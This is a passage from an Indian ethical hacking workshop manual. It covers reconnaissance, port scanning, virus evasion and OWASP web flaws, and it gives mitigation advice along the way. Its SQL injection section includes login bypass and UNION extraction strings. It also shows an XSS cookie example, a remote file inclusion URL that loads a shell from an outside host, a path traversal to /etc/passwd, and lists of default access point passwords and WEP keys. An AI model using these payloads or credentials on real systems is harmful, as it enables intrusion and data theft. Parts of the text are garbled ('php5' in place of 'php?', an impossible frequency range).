TechDefence Workshop Final

1

Course Material

Ethical Hacking & Information Security

By

Sunny Vaghela www.sunnyvaghela.com

Head Office: A 805 Wallstreet 2,Opp Orient Club,Near Gujarat College,Ahmedabad 380007

Office: +91 79 40047405 , Mobile: +91 9898493002

Website: www.techdefence.com Email: [email protected]

India Branch Offices: Vallabh Vidyanagar,Rajkot,Himmatnagar,Nashik,Hyderabad

International Offices: Australia, Mauritius

2

INDEX

Sr No.

Title

Page No.

1 Ethical Hacking

1.1 Cyber Ethics 4

1.2 Information Gathering 7

1.3 Scanning 17

1.4 Virus, Worms & Trojans 22

2 Web Application Security

2.1 Why Web Application Security? 27

2.2 Security Misconceptions

29

2.3 Reasons for Attacking Web Applications

30

2.4 OWASP Top 10 Vulnerabilities 31

2.5 Security guidelines 44

3 Wireless Hacking & Security

3.1 Wireless Standards 47

3.2 WEP & WPA Summery 55

3.3 Cracking WEP & WPA & Countermeasures 56

3

CHAPTER 1

Ethical Hacking

1.1 Cyber Ethics

1.2 Information Gathering

1.3 Scanning

1.4 Virus, Worms, Trojans and Virus analysis

4

1.1 CYBER ETHICS

Cyber ethics is a code of behavior for using the Internet. Since we are going to view

it as the hackers prospective, we will first dissect what the word hacker stands for?

Hacker:

A person, who delights in having an intimate understanding of the internal workings

of a system, computers and computer networks in particular. It is used to refer to someone

skilled in the use of computer systems, especially if that skill was obtained in an exploratory

way. The term is often misused in a pejorative context, where "cracker" would be the

correct term. And due to that the term evolved to be applied to individuals, with or without

skill, who break into security systems. Several subgroups of the computer are underground

with different attitudes and aims use different terms to demarcate themselves from each

other, or try to exclude some specific group with which they do not agree. In hackers

culture there are many different categories, such as white hat (ethical hacking), grey hat,

black hat and script kiddies. Usually the term cracker refers to black hat hackers, or more

generally hackers with unlawful intentions.

1. White Hat

A white hat is the hero or good guy, especially in computing slang, where it refers to an

ethical hacker or Penetration tester who focuses on securing and protecting IT systems.

White Hat Hackers, also known as Ethical Hackers, are Computer Security experts, who are

specialized in penetration testing, and other testing methodologies, to ensure that a

company's information systems are secure. Such people are employed by companies where

these professionals are sometimes called sneakers, tiger teams or red teams.

2. Grey Hat

A grey hat, in the hacking community, refers to a skilled hacker who sometimes acts

legally, sometimes in good will, and sometimes not. They are a hybrid between white and

black hat hackers. They usually do not hack for personal gain or have malicious intentions,

but may or may not occasionally commit crimes during the course of their technological

5

exploits.

3. Black Hat

A black hat is the villain or bad guy. It refers to a hacker that breaks into networks or

computers, or creates computer viruses. Black Hat Hackers (also called "crackers") who

are specialized in unauthorized penetration of information systems. They may use

computers to attack systems for profit, for fun, or for political motivations or as a part of a

social cause. Such penetration often involves modification and/or destruction of data, and

is done without authorization and hence they should not be confused with ethical hackers.

4. Phreaker

Phreaking is a slang term coined to describe the activity of a subculture of people who

study, experiment with, or explore telecommunication systems, like equipment and systems

connected to public telephone networks. As telephone networks have become

computerized, Phreaking has become closely linked with computer hacking. This is

sometimes called the H/P culture (with H standing for Hacking and P standing for

Phreaking). The term "phreak" is a mixture of the words "phone" and "freak", and may also

refer to the use of various audio frequencies to manipulate a phone system. "Phreak",

"phreaker", or "phone phreak" are names used for and by individuals who participate in

phreaking.

5. Script Kiddies

In hacker culture, a script kiddie, occasionally script bunny, skiddie, script kitty, script-

running juvenile (SRJ), or similar, is a derogatory term used to describe those who use

scripts or programs developed by others to attack computer systems and networks.

It is generally assumed that script kiddies are like amateur kids who lack the ability to write

sophisticated hacking programs or exploits on their own, and that their objective is to try to

impress their friends or gain credit in underground hacker communities.

6.Hacktivists

Some people describing themselves as hacktivists have taken to defacing websites for

political reasons, such as attacking and defacing government websites as well as web sites

of groups who oppose their ideology. Hacktivist is a mixture of the words Hacker and

Activist. Their activities include many political ideals and issues. Hacktivism is a

6

controversial term. Some argue it was coined to describe how electronic direct action might

work toward social change by combining programming skills with critical thinking. Others

use it as practically synonymous with malicious, destructive acts that undermine the

security of the Internet as a technical, economic, and political platform.

Malicious Hacker Strategies :

As there are steps to develop any software so as Every hackers do follow some predefined

rules or steps to hack into the system. They are

Reconnaissance:- The basic information gathering about the target system.

Scanning:- Scanning the target system for open ports and services running on

the open ports etc.

Gaining Access:- Gaining the actual access of the particular target system by

exploiting the system.

Maintaining Access:- Keeping the access of the system even after leaving

the system so as not to perform all the steps from the scratch.

Clearing Tracks:- To remove the footprints if any so as to remain undetected

from the victim.

7

1.2 Information Gathering

Information Gathering Is initial process as far as hacking & investigation is

concerned. It is the process of profiling any organization , system , server or an individual

using methodological procedure.

Information gathering is used by attacker as well as investigator to get more information

about target.

Attackers point of view:

Attacker will first gather initial information like domain name , IPaddress , Network IP

range , operating system , services , control panel information , vulnerable services etc

before attacking into system.

Footprinting is required to ensure that isolated information repositories that are critical to

the attack are not overlooked or left undiscovered. Footprinting merely comprises on aspect

of the entire information gathering process, but is considered one of the most important

stages of a mature hack.

Attacker will take 90% of time in information gathering & only 10% of time while

attacking & gaining an access to the system

Investigators Point of view:

Investigator will gather initial information like traces of criminal on an internet, about his

name, occupation, address, contact number about his/her company/organization before

taking any legal action.

This will help investigator to profile the criminal & his/her activities properly during

interrogation.

Following are the various methodologies for information gathering.

1. Information Gathering using Search engine:

8

One leaves footprints/information everywhere while surfing internet. this is basic

principle for investigators as well as hackers. the only difference is the way they use this

information.

Attacker will gather information about the system, operating system, about vulnerable

application running on them & later on exploit it.

Investigator will gather information on how he got an access to system & where he left

his/her footprint behind on the same system & later on traced it.

Search engine are most powerful tool to search about any individual, organization & system

Following are the list of top 10 search engines:

Google Search Worlds most powerful search engine: www.google.com

Yahoo Search: www.search.yahoo.com

MSN Live Search: www.live.com

AOL Search: www.search.aol.in

Ask Search: www.ask.com

Altavista Search: www.altavista.com

Fast Search : www.alltheweb.com

Gigablast : www.gigablast.com

Snap Search: www.snap.com

2. Information gathering using relational search engine.

These type of search engines gets results from different search engine & make relation or

connections between those results.

Kartoo

9

Maltego

Maltego is an open source intelligence and forensics application. It allows for the mining

and gathering of information as well as the representation of this information in a

meaningful way.Coupled with its graphing libraries, Maltego, allows you to identify key

relationships between information and identify previously unknown relationships between

them. It is a must-have tool in the forensics.security and intelligence fields! Maltego offers

the user with unprecedented information. Information is leverage.

People Search Investigator can find personal information using people search.

10

People search will give information about phone number, address as well as background

info about the organizations.

Yahoo People Search - www.people.yahoo.com

Intellius:

Whois Lookup:

WHOIS (pronounced "who is"; not an acronym) is a query/response protocol which is

widely used for querying an official database in order to determine the owner of a domain

name, an IP address, or an autonomous system number on the Internet. WHOIS lookups

were traditionally made using a command line interface, but a number of simplified web-

11

based tools now exist for looking up domain ownership details from different databases.

Web-based WHOIS clients still rely on the WHOIS protocol to connect to a WHOIS server

and do lookups, and command-line WHOIS clients are still quite widely used by system

administrators. WHOIS normally runs on TCP port 43.

Presently ICANN is undertaking a study to determine the uses and abuses of WHOIS

information. Other studies that are ongoing concern the accuracy of WHOIS information,

and the effectiveness of the processes for reporting inaccurate public WHOIS

information.

Querying Regional Internet Registries:

WHOIS servers belonging to Regional Internet Registries (RIR) can be queried to

determine the Internet Service Provider responsible for a particular IP address. These

servers are:

ARIN - http://whois.arin.net

RIPE NCC - http://www.ripe.net/whois/

APNIC - http://whois.apnic.net

LACNIC - http://whois.lacnic.net

AfriNIC - http://whois.afrinic.net

The records of each of these registries are cross-referenced, so that a query to ARIN for a

record which belongs to RIPE will return a placeholder pointing to the RIPE WHOIS

server. This lets the WHOIS user making the query know that the detailed information

resides on the RIPE server. Apart from the RIRs mentioned above, there is also a

commercial global service: Routing Assets Database used by some large networks (eg.

large internet providers that acquired other ISPs in several RIR areas).

Domain Tools:

Whois.net

12

Samspade.org

.In registry

\

Example: www.techdefence.com whois info using www.domaintools.com

Above picture indicates that the website www.techdefence.com has title TechDefence

Consulting. Its Search Engine Optimization score is 62% for 23 terms.

13

Techdefence,com domain is registered from DIRECT INTERNET SOLUTIONS PVT

LTD.it also gives creation date,expiry date & last modified date of domain.

Name Servers ns1.hosthunger.com & ns2.hosthunger.com gives information about

hosting server.

Server Data is apache that means LINUX is operating system which is running on

techdefence

server.

IP address of Techdefence.com is 208.43.231.66

Server company is Softlayer Technologies

Domain Status is Active.

Registrant:

TechDefence Consulting Pvt Ltd

Sunny Vaghela ([email protected])

Ahmedabad

Ahmedabad

Gujarat,380007

INDIA

Tel. +91.7926631931

The above information tells that domain techdefence.com is registered by Sunny Vaghela

from Ahmedabad.

14

Phone Number of Sunny Vaghela is +91 7926631931

Email Id used to register the same website is [email protected]

Reverse IP Mapping:

Reverse IP mapping is the method to find number of websites hosted on same server.

Here by selecting the Reverse IP link we can get list of websites hosted on 208.43.231.66

along with techdefence.com

Trace Route:

Traceroute gives useful information regarding number of servers between your computers

& remote computers.

Useful for investigation as well as different attacks.

Visualroute, Neotrace.

NeoTrace gives MAP view,Node View as well as List View of number of nodes between

your computer & remote computer.

MAP View for www.techdefence.com

List View for techdefence.com

15

Node View for techdefence.com

Information of Server Node(last Node)

Geowhere:

Find websites using popular news groups.also finds out mailing lists,news groups & extract

information from 20 search engines.

16

Email Spiders

Email Spiders are automated softwares which captures email ids using spiders & store them

on the database. Spammers are using email spiders to collect thousand emails for spamming

purposes.

Other Tools: www.visualroute.visualware.com

www.samspade.org

www.dnsstuff.com

17

1.3 Scanning

Many time ago we scanned the different ports making telnet manually. Today

people use more sophisticated programs with massive methods to scan IP ranges searching

a lot of ports.

Scanning is the process of finding out open/close ports, vulnerabilities in remote system,

server & networks. Scanning will reveal IP addresses, Operating systems, Services running

on remote computer.

There are three types of scanning.

1. Port Scanning

2. Network Scanning

3. Vulnerability Scanning

Port Scanning:

Port Scanning is one of the most popular technique attacker use to discover the service they

break into.

All machines connected to a LAN or connected to Internet via a modem run many

services that listen at well-known and not so well-known ports.

There are 1 to 65535 ports are available in the computer.

By port scanning the attacker finds which ports are available .

Ports: The port numbers are unique only within a computer system.

Port numbers are 16-bit unsigned numbers.

The port numbers are divided into three ranges:

1. Well Known Ports (0..1023),

2. The Registered Ports (1024..49151),

18

3. The Dynamic and/or Private Ports (49152..65535).

Well Known Ports:

echo 7/tcp Echo

ftp-data 20/udp File Transfer [Default Data]

ftp 21/tcp File Transfer [Control]

ssh 22/tcp SSH Remote Login Protocol

telnet 23/tcp Telnet

domain 53/udp Domain Name Server

www-http 80/tcp World Wide Web HTTP.

Smtp 25/tcp Simple mail transfer protocol

Whois 43/tcp whois server

Registered Ports:

wins 1512/tcp Microsoft Windows Internet Name Service

radius 1812/udp RADIUS authentication protocol

yahoo 5010 Yahoo! Messenger

x11 6000-6063/tcp X Window System

TCP Packet Header

SYN Synchronize it is used to initiate connection between hosts.

ACk Acknowledgement It is used to establish connection between hosts.

PSH push tells receiving system to send all buffer data.

URG urgent stats that data contain in packet should be process immediately.

FIN finish tells remote system that there will be no more transmission.

TTL Time to Live.

Open Scan

Known as TCP Scan and normally used to program sockets, this technique is the oldest and

works making a full connection with the server.

SYN ACK RST PSH URG FIN TTL WINDOW

19

For that it makes an autentication with 3 packets. Is known ast hree-way-handshake:

For the ports opened:

Client ----> SYN ---->

For the ports closed:

Client ----> SYN ---->

20

A SYN packet is sent to remote computer.

the target host responds with a SYN+ACK, this indicates the port is listening and an

RST indicates a non- listener.

FIN Scan:

Another technique sends erroneous packets at a port, expecting that open listening

ports will send back different error messages than closed ports.

Closed ports reply to fin packets with RST.

Open ports ignore packets.

XMAS Scan:

XMAS uses scans where all flags in the TCP packet are set & sent to target host.

Closed ports reply to packets with RST.


NULL Scan:

Null Scan used no flags of TCP header & it sent to the target host.

Closed ports reply to packets with RST.


Port Scanner: NMAP

Nmap is powerful utility to scan large number of tools.

21

Provided with GUI as well as Command line interface.

It is supported by many operating systems.

It can carry out SYN Scan, FIN Scan, Stealth Scan, Half open scan & many other

types.

Network Scanners: Global Network Inventory Software:

22

1.4 Virus, Worms, Trojans and Virus analysis

Spyware

Spyware is a piece of software that gets installed on computer without your consent. It

collects your personal information without you being aware of it. It also Change how your

computer or web browser is configured and bombard you with online advertisements.

Spyware programs are notorious for being difficult to remove on your own and slow down

your PC. A program gets installed in the background while you are doing something else on

Internet.Spware has fairly widespread because your cable modem or DSL connection is

always connected.

Difference between Virus, Worms and Trojans

Virus is an application that self replicates by injecting its code into other data files. Virus

spreads and attempts to consume specific targets and are normally executables.

Worm copies itself over a network. It is a program that views the infection points another

computer rather than as other executables files on an already infected computer .

Trojan is a program that once executed performs a task other than expected.

Modes of Transmission

IRC

ICQ

Email Attachments

Physical Access

Browser & email Software Bugs

Advertisements

NetBIOS

Fake Programs Fake Programs

23

Virus Properties

Your computer can be infected even if files are just copied

Can be Polymorphic.

Can be memory or non-memory resident

Can be a stealth virus

Viruses can carry other viruses

Can make the system never show outward signs

Can stay on the computer even if the computer is formatted.

Virus Operation Phase

Most of the viruses operate in two phases.

1. Infection Phase In this phase virus developers decide

- When to Infect program

- Which programs to infect

Some viruses infect the computer as soon as virus file installed in computer. Some

viruses infect the computer as soon as virus file installed in computer.

Some viruses infect computer at specific date,time or perticular event.

TSR viruses loaded into memory & later infect the PCs.

2. Attack Phase - In this phase Virus will

- Delete files.

- Replicate itself to another PCs.

- Corrupt targets only

Virus Indications

Following are some of the common indications of Virus when it infects system.

Files have strange name than the normal.

File extensions can also be changed.

Program takes longer time to load than the normal.

Computers hard drives constantly runs out of free space

24

Victim will not be able to open some programs.

Programs getting corrupted without any reasons.

Virus Types

Following are some of the common indications of Virus when it infects system.

Macro Virus Spreads & Infects database files.

File Virus Infects Executables.

Source Code Virus Affects & Damage source code.

Network Virus Spreads via network elements & protocols.

Boot Virus Infects boot sectors & records.

Shell Virus Virus Code forms shell around target hosts genuine program & host it as

sub routine.

Terminate & stay resident virus remains permanently in the memory during the work

session even after target host is executed & terminated.

Methods to Avoid Detection

1. Same last Modified Date.

In order to avoid detection by users, some viruses employ different kinds of

deception.

Some old viruses, especially on the MS-DOS platform, make sure that the "last

modified" date of a host file stays the same when the file is infected by the virus.

This approach sometimes fool anti-virus software.

2. Overwriting Unused areas of the .exe files.

3. Killing tasks of Antivirus Softwares.

Some viruses try to avoid detection by killing the tasks associated with antivirus

software before it can detect them.

4. Avoiding Bait files & other undesirable hosts.

25

Bait files (or goat files) are files that are specially created by anti-virus software, or by

anti-virus professionals themselves, to be infected by a virus.

Many anti-virus programs perform an integrity check of their own code.

Infecting such programs will therefore increase the likelihood that the virus is

detected.

Anti-virus professionals can use bait files to take a sample of a virus

5. Making stealth virus.

Some viruses try to trick anti-virus software by intercepting its requests to the

operating system.

The virus can then return an uninfected version of the file to the anti-virus

software, so that it seems that the file is "clean".

6. Self Modification on each Infection.

Some viruses try to trick anti-virus software by modifying themselves on each

modifications

As file signatures are modified, Antivirus softwares find it difficult to detect.

7. Encryption with variable key.

Some viruses use simple methods to encipher the code.

The virus is encrypted with different encryption keys on each infections.

The AV cannot scan such files directly using conventional methods.

Virus Analysis

1. IDA Pro tool

It is dissembler & debugger tool

Runs both on Linux & windows

Can be used in Source Code Analysis, Vulnerability Research & Reverse

Engineering.

26

Autoruns :

Process Explorer

27

CHAPTER 2

Web Application

Hacking & Security

2.1 Why Web Application Security?


2.3 Reasons for Attacking Web Applications

2.4 OWASP Top 10 Vulnerabilities

2.5 Security guidelines

2.6 Web Application Security checklist

28

2.1 Why Web Application Security?

Problem Illustration

Application Layer

Attacker sends attacks inside valid HTTP requests.

Your custom code is tricked into doing something it should not.

Security requires software development expertise, not signatures.

Network Layer

Firewall, hardening, patching, IDS, and SSL cannot detect or stop attacks

inside HTTP requests.

Security relies on signature databases

29


The Firewall protects my web server and database

Access to the server through ports 80 and 443 makes the web server part of your

external perimeter defense.

Vulnerabilities in the web server software or web applications may allow

access to internal network resources

The IDS protects my web server and database

The IDS is configured to detect signatures of various well-known attacks.

Attack signatures do not include those for attacks against custom applications.

SSL secures my site

SSL secures the transport of data between the web server and the users browser.

SSL does not protect against attacks against the server and applications.

SSL is the hackers best friend due to the false sense of security.

The Source of Problem

Malicious hackers dont create security holes; they simply exploit them. Security holes

and vulnerabilities the real root cause of the problem are the result of bad software

design and implementation.

- John Viega & Gary McGraw.

30

2.3 Reasons For Attacking Web Applications.

Vulnerability Used

31

2.4 OWASP TOP 10 VULNERABILITIES

1. INJECTION FLAWS

Injection means

Tricking an application into including unintended commands in the data

sent to an interpreter

Interpreters

Take strings and interpret them as commands.

SQL, OS Shell, LDAP, XPath, etc

SQL injection is still quite common.

Many applications still susceptible.

INJECTION FLAWS

1. Application presents a form to the attacker all via SSL.

2. Attacker sends an attack in the form data

3. Application forwards attack to the database in a SQL query

4. Database runs query containing attack and sends encrypted results back to application

5. Application decrypts data as normal and sends results to the user

32

SQL INJECTION

It is a flaw in "web application" development, it is not a DB or web server problem.

Most programmers are still not aware of this problem.

A lot of the tutorials & demo templates are vulnerable

Even worse, a lot of solutions posted on the Internet are not good enough.

In our pen tests over 60% of our clients turn out to be vulnerable to SQL

Injection

BUSINESS IMPACT OF SQL INJECTION

Attackers can

Access the entire database schema

Steal, modify, and delete database contents

Prevent legitimate access to the database

Run operating system commands on database server

Disclose company proprietary data

Common vulnerable login query

SELECT * FROM users WHERE login = 'victor' AND password = '123

(If it returns something then login!)

ASP/MS SQL Server login syntax

var sql = "SELECT * FROM users WHERE login = '" + formusr + "' AND

password = '" + formpwd + "'";

Injecting Through Strings

formusr = ' or 1=1

formpwd = anything

33

Final query would look like this:

SELECT * FROM users WHERE username = ' ' or 1=1

AND password = 'anything'

THE POWER OF

It closes the string parameter.

Everything after is considered part of the SQL command.

SELECT * FROM clients

WHERE account = 12345678

AND pin = 1111

PHP/MySQL login syntax

$sql = "SELECT * FROM clients WHERE " .

"account = $formacct AND " .

"pin = $formpin";

Injecting Numeric Fields

$formacct = 1 or 1=1 #

$formpin = 1111

Final query would look like this:

SELECT * FROM clients

WHERE account = 1 or 1=1

# AND pin = 1111

Standard SQL commands such as

"Select , "Insert, "Update, "Delete, "Create", and "Drop" can be used to accomplish

almost everything that one needs to do with a database.

When you click a link like this,

34

www.site.com/news.asp5ArticleID=10,

The link tells the site to look in the table that stores

the article names for an article whos "ArticleID" is

10.

The "INFORMATION_SCHEMA" holds the names of every table and column on a site.

On every SQL server there will be an "INFORMATION_SCHEMA" and its name will

never change.

Understanding Error Messages

Example : www.site.com/index.php5id=1

Add or /* after id= 1 to check whether site is vulnerable or not.

If site is giving some error then site is vulnerable to SQL injection.

If blank page is shows then the site is vulnerable to blind injection.

Finding out Vulnerable Columns

Example : www.site.com/index.php5id=1+order+by+1 --

Increase order till you get an error message something like

Unknown Column in Order Clause

Extracting Information from database

www.site.com/index.php5id=1+union+all+select+1,table_name,3,4,5,6,7+from+informati

on_schema.tables

The above mentioned query gives names of tables stored in database.

www.site.com/index.php5id=1+union+all+select+1,column_name+3,4,5,6,7+from+infor

mation_schema.columns+where+table_schema=char()

The above mentioned query gives names of columns stored of all tables

SQL Injection Mitigation

Strong Design

35

Define an easy "secure" path to querying data

Use stored procedures for interacting with database

Call stored procedures through a parameterized API

Validate all input through generic routines

Use the principle of "least privilege"

Input Validation

Define data types for each field

Implement stringent "allow only good" filters

If the input is supposed to be numeric, use a numeric variable in your script to

store it

Reject bad input rather than attempting to escape or modify it

Implement stringent "known bad" filters

For example: reject "select", "insert", "update", "shutdown", "delete", "drop", "--",

"'"

Harden the Server

Run DB as a low-privilege user account

Remove unused stored procedures and functionality or restrict access to

administrators

Change permissions and remove "public" access to system objects

Audit password strength for all user accounts

XSS ( Cross Site Scripting)

Occurs any time

Raw data from attacker is sent to an innocent user

Raw data

Stored in database

Reflected from web input (form field, hidden field, url, etc)

Sent directly into rich JavaScript client

36

Virtually every web application has this problem

Try this in your browser javascript:alert(document.cookie)

Stored XSS

Reflected XSS

Business Impact of XSS

Attackers can

Steal user sessions for complete account takeover.

Steal data on web pages viewed by victim.

Deface pages viewed by victim.

Use web pages for phishing.

37

Finding XSS

Most Common Blogs, Forums, Shout boxes, Comment Boxes, Search Box's, there

are too many to mention.

Using 'Google Dorks search inurl: inurl:"search.php5q="

XSS Examples

http://site.com/search.php5q=alert("XSS")

http://site.com/search.php5q=window.open( "http://www.google.com/"

)

Case Study: XSS

A British researcher, Jim Ley, discovered

(2004) a XSS flaw in Google and provided this

proof of concept Phishing page where Google

becomes a paying service. If you would be so

kind as to provide your credit card details .

Now fixed.

Finding XSS

Be sure that there is plan for input validation & encoding.

Be sure that it accepts all input data.

Positive Validation for all untrusted input fields.

HTML entity encoding method.

Fixing XSS

If you found XSS bugs in your scripts, its easy to secure, take a look at the below

code.

38

if(isset($_POST['form'])){echo "" .$_POST['form'].

"";}

Here the variable $_POST['from'] was coming from a input box, then you have a

XSS attack.

The following is a very easy way to secure that.

$charset='UTF-8'; $data = htmlentities ($_POST['form'], ENT_NOQUOTES,

$charset);

if(isset($data)){echo "" .$data. "";}

This will take all possible code and make it not executable. by turning it into stuff

like < etc...

$this = $_GET['id'];

echo "you are viewing " . $this . "blog";

If we include 5id=alert("XSS")

into the url its going to execute our code, a very easy way to secure this is using

(int) check the following code

$this = (int)$_GET['id'];

echo "you are viewing " . $this . "blog";

If at anytime the variable contains anything but a Integer, it will return 0.

Malicious File Inclusion - RFI

Malicious file execution vulnerabilities are found in many applications.

Developers will often directly use or concatenate potentially hostile input with file

or stream functions, or improperly trust input files.

On many platforms, frameworks allow the use of external object references, such

as URLs or file system references.

When the data is insufficiently checked, this can lead to arbitrary remote and

hostile content being included, processed or invoked by the web server.

39

Business Impact of RFI

This allows attackers to perform:

Remote code execution

Remote root kit installation and complete system compromise.

Remote shell installation

Remote modification & deletion of files on server.

RFI (Remote File Inclusion)

If allow_url_include is on in php.ini, we can inject a shell directly.

You only need to load by GET or POST directly to an URI with the shell (using a

non PHP extension):

Like http://www.techdefence.com/index.php5page=news.php

Now if the Index.php has Remote File Inclusion like

So the above URL is written like

http://www.techdefence.com/index.php5page=http://www.evilscript.com/shell.txt

Fixing RFI

Practice Secure Coding Techniques

Instead of using $_GET use $_POST

40

Filter all the pages and Give file permissions perfectly so that no one can access.

Keep Safe Mode On in PHP.

Disallow unused commands in linux environment

Insecure Direct Object Reference /LFI (Local File Inclusion)

A direct object reference occurs when a developer exposes a reference to an

internal implementation object, such as a file, directory, database record, or key, as

a URL or form parameter.

An attacker can manipulate direct object references to access other objects

without authorization, unless an access control check is in place.

Insecure Direct Object Reference

Websites often use an include() system to display their pages, even more often this

system is insecure.

A practical example: index.php:

which would result in a website with links such as: index.php5page=about.php

index.php5page=news.php

The simplest way to see if a script is vulnerable to local file inclusion, is this:

index.php5page=../../../../../../../../../etc/passwd

That Shows the complete User information in that server with paths..

Where ../ causes the script to move up one directory,

Multiple ../ cause the script to move to the top level directory (/, the root of the

filesystem) and /etc/passwd is the Unix passwd file.

The result is

root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh

bin:x:2:2:bin:/bin:/bin/sh ...on and on and on.

Fixing Insecure Direct Object Reference

41

Avoid exposing your private object references to users whenever possible, such as

primary keys or filenames.

Verify authorization to all referenced objects

Information Leakage and Improper Error Handling

Applications can unintentionally leak information about their configuration,

internal workings, or violate privacy through a variety of application problems.

Applications can also leak internal state via how long they take to process certain

operations or via different responses to differing inputs, such as displaying the

same error text with different error numbers.

Web applications will often leak information about their internal state through

detailed or debug error messages.

Improper Error Handling

Many security mechanisms fail to open

isAuthenticated()

isAuthorized()

isValid()

Bad logic (i.e., fail open)

42

if (!security_test())

then return false

return true

Good logic (i.e., fail secure)

if (security_test())

then return true

return false

Broken Authentication & Session Management

Proper authentication and session management is critical to web application

security.

Flaws in this area most frequently involve the failure to protect credentials and

session tokens through their lifecycle.

Business Impact of BA & SM

Attacker Can..

Hijack User Accounts

Hijack Administrative accounts.

Undermine authorization & accountability controls

Can Cause Privacy Violations

Fixing BA & SM

Only use the inbuilt session management mechanism.

Use a single authentication mechanism.

Do not allow the login process to start from an unencrypted page.

Ensure that every page has a logout link.

Use a timeout period.

Do not expose any session identifiers or any portion of valid credentials in URLs

or logs.

43

Failure to restrict URL Access

Frequently, the only protection for a URL is that links to that page are not

presented to unauthorized users.

However, a motivated, skilled, or just plain lucky attacker may be able to find and

access these pages, invoke functions, and view data.

Fixing Failure to restrict URL Access

Ensure the access control matrix is part of the business, architecture, and design of

the application

Ensure that all URLs and business functions are protected by an effective access

control mechanism.

Pay close attention to include/library files.

Do not assume that users will be unaware of special or hidden URLs or APIs

Keep up to date with virus protection and patches

44

2.5 Security Guidelines.

1. Validate Input and Output

2. Fail Securely (Closed)

3. Keep it Simple

4. Use and Reuse Trusted Components

5. Defence in Depth

6. Only as Secure as the Weakest Link

7. Security By Obscurity Won't Work

8. Least Privilege

9. Compartmentalization (Separation of Privileges)

Validate Input & Output

All user input and user output should be checked to ensure it is both appropriate

and expected.

Allow only explicitly defined characteristics and drop all other data.

Fail Securely

When it fails, it fails closed.

It should fail to a state that rejects all subsequent security requests.

A good analogy is a firewall. If a firewall fails it should drop all subsequent

packets

Keep It Simple

If a security system is too complex for its user base, it will either not be used or

users will try to find measures to bypass it.

This message applies equally to tasks that an administrator must perform in order

to secure an application.

This message is also intended for security layer API's that application developers

45

must use to build the system.

Use & Reuse Components

Using and reusing trusted components makes sense both from a resource stance

and from a security stance.

When someone else has proven they got it right, take advantage of it.

Defence In Depth

Relying on one component to perform its function 100% of the time is unrealistic.

While we hope to build software and hardware that works as planned, predicting

the unexpected is difficult. Good systems don't predict the unexpected, but plan

for it.

Only as Secure as the Weakest Link

Careful thought must be given to what one is securing.

Attackers are lazy and will find the weakest point and attempt to exploit it.

Security By Obscurity Won't Work

It's naive to think that hiding things from prying eyes doesn't buy some amount of

time.

This strategy doesn't work in the long term and has no guarantee of working in

the short term.

Least Privilege

Systems should be designed in such a way that they run with the least amount of

system privilege they need to do their job.

Compartmentalization (Separation of Privileges)

Compartmentalizing users, processes and data helps contain problems if they do

46

occur.

Compartmentalization is an important concept widely adopted in the information

security realm.

47

CHAPTER 3

Wireless

Hacking & Security

3.1 Wireless Standards

3.2 WEP & WPA Summery

3.3 Cracking WEP & WPA

48

3.1 Wireless Hacking

Wireless networking technology is becoming increasingly popular but at the same

time has introduced many security issues. The popularity in wireless technology is driven

by two primary factors - convenience and cost. A Wireless local area network (WLAN)

allows workers to access digital resources without being locked into their desks. Laptops

could be carried into meetings or even into Starbucks cafe tapping into the wireless

network. This convenience has become affordable.

Wireless LAN standards are defined by the IEEE's 802.11 working group. WLANs

come in three flavors:

802.11b

Operates in the 2.4000 GHz to 2.2835GHz frtequency range and can operate at up to 11

megabits per second.

802.11a

Operates in the 5.15-5.35GHz to 5.725-5.825GHz frequency range and can operate at up

to 54 mega bits per second.

802.11g

Operates in the 2.4GHz frequency range (increased bandwidth range) and can operate at

up to 54 megabits per second.

When setting up a WLAN, the channel and service set identifier (SSID) must be configured

in addition to traditional network settings such as IP address and a subnet mask.

The channel is a number between 1 and 11 (1 and 13 in Europe) and designates the

frequency on which the network will operate.

49

The SSID is an alphanumeric string that differentiates networks operating on the same

channel.

It is essentially a configurable name that identifies an individual network. These

settings are important factors when identifying WLANs and sniffing traffic.

SSIDs

The SSID is a unique identifier that wireless networking devices use to establish and

maintain wireless connectivity. SSID acts as a single shared password between access points

and clients. Security concerns arise when the default values are not changed, as these units

can be easily compromised. A non-secure access mode, allows clients to connect to the

access point using the configured SSID, a blank SSID, or an SSID configured as "any."

Attackers Point of view:

If the target access point responds to a Broadcast SSID Probe, then he might just be

in luck. This is because most wireless card drivers are configured with an SSID of ANY so

that they will be able to associate with the wireless network. When the SSID is set to ANY,

the driver sends a probe request to the broadcast address with a zero-length SSID, causing

most access point that will respond to these requests to issue a response with its SSID and

info. Though this configuration makes it easier for the user, as the user does not have to

remember the SSID to connect to the wireless LAN, it makes it much simpler for attackers

to gather SSIDs. Some of the common default passwords are:

3Com AirConnect 2.4 GHz DS (newer 11mbit, Harris/Intersil Prism based)

Default SSID: 'comcomcom'

3Com other Acccess Points

Default SSID: '3com'

Addtron (Model:?)

Default SSID: 'WLAN'

Cisco Aironet 900Mhz/2.4GHz BR1000/e, BR5200/e and BR4800

50

Default SSID: 'tsunami'; '2'

Console Port: No Default Password

Telnet password: No Default Password

HTTP management: On by default, No Default Password

Apple Airport

Default SSID: 'AirPort Network'; 'AirPort Netzwerk'

BayStack 650/660 802.11 DS AP

Default SSID: 'Default SSID'

Default admin pass:

Default Channel: 1

MAC addr: 00:20:d8:XX:XX:XX

Compaq WL-100/200/300/400

Default SSID: 'Compaq'

Dlink DL-713 802.11 DS Access Point


Default Channel: 11

Default IP address: DHCP-administered

INTEL Pro/Wireless 2011 802.11 DSSS - PC Card

Default SSID: '101' ; 'xlan' ; 'intel' ; '195'

51

Default Channel: 3

INTEL Pro/Wireless 2011 802.11 DSSS - Access Point

Default SSID: '101' ; '195'

LINKSYS WAP-11 802.11 DS Access Point

Default SSID: 'linksys'

Default Channel: 6

Default WEP key one: 10 11 12 13 14 15

Default WEP key two: 20 21 22 23 24 25

Default WEP key three: 30 31 32 33 34 35

Default WEP key four: 40 41 42 43 44 45

LINKSYS WPC-11 PCMCIA 802.11b DS 2.4 GHz - PC Card

Default SSID: 'linksys' ; 'Wireless'

Default Channel: 3 ; 6 ; 11

Netgear 802.11 DS ME102 / MA401

Default SSID: 'wireless'

Default Channel: 6

Default IP address: 192.168.0.5

Default WEP: Disabled

Default WEP KEY1: 11 11 11 11 11

52




Default MAC: 00:30:ab:xx:xx:xx

SMC Access Point Family SMC2652W


Default Channel: 11

Default HTTP: user: default pass: WLAN_AP

Default MAC: 00:90:d1:00:b7:6b (00:90:d1:xx:xx:xx)

Console Port: No Password, AT command set

SMC 2526W Wireless Access Point Dual-Dipole


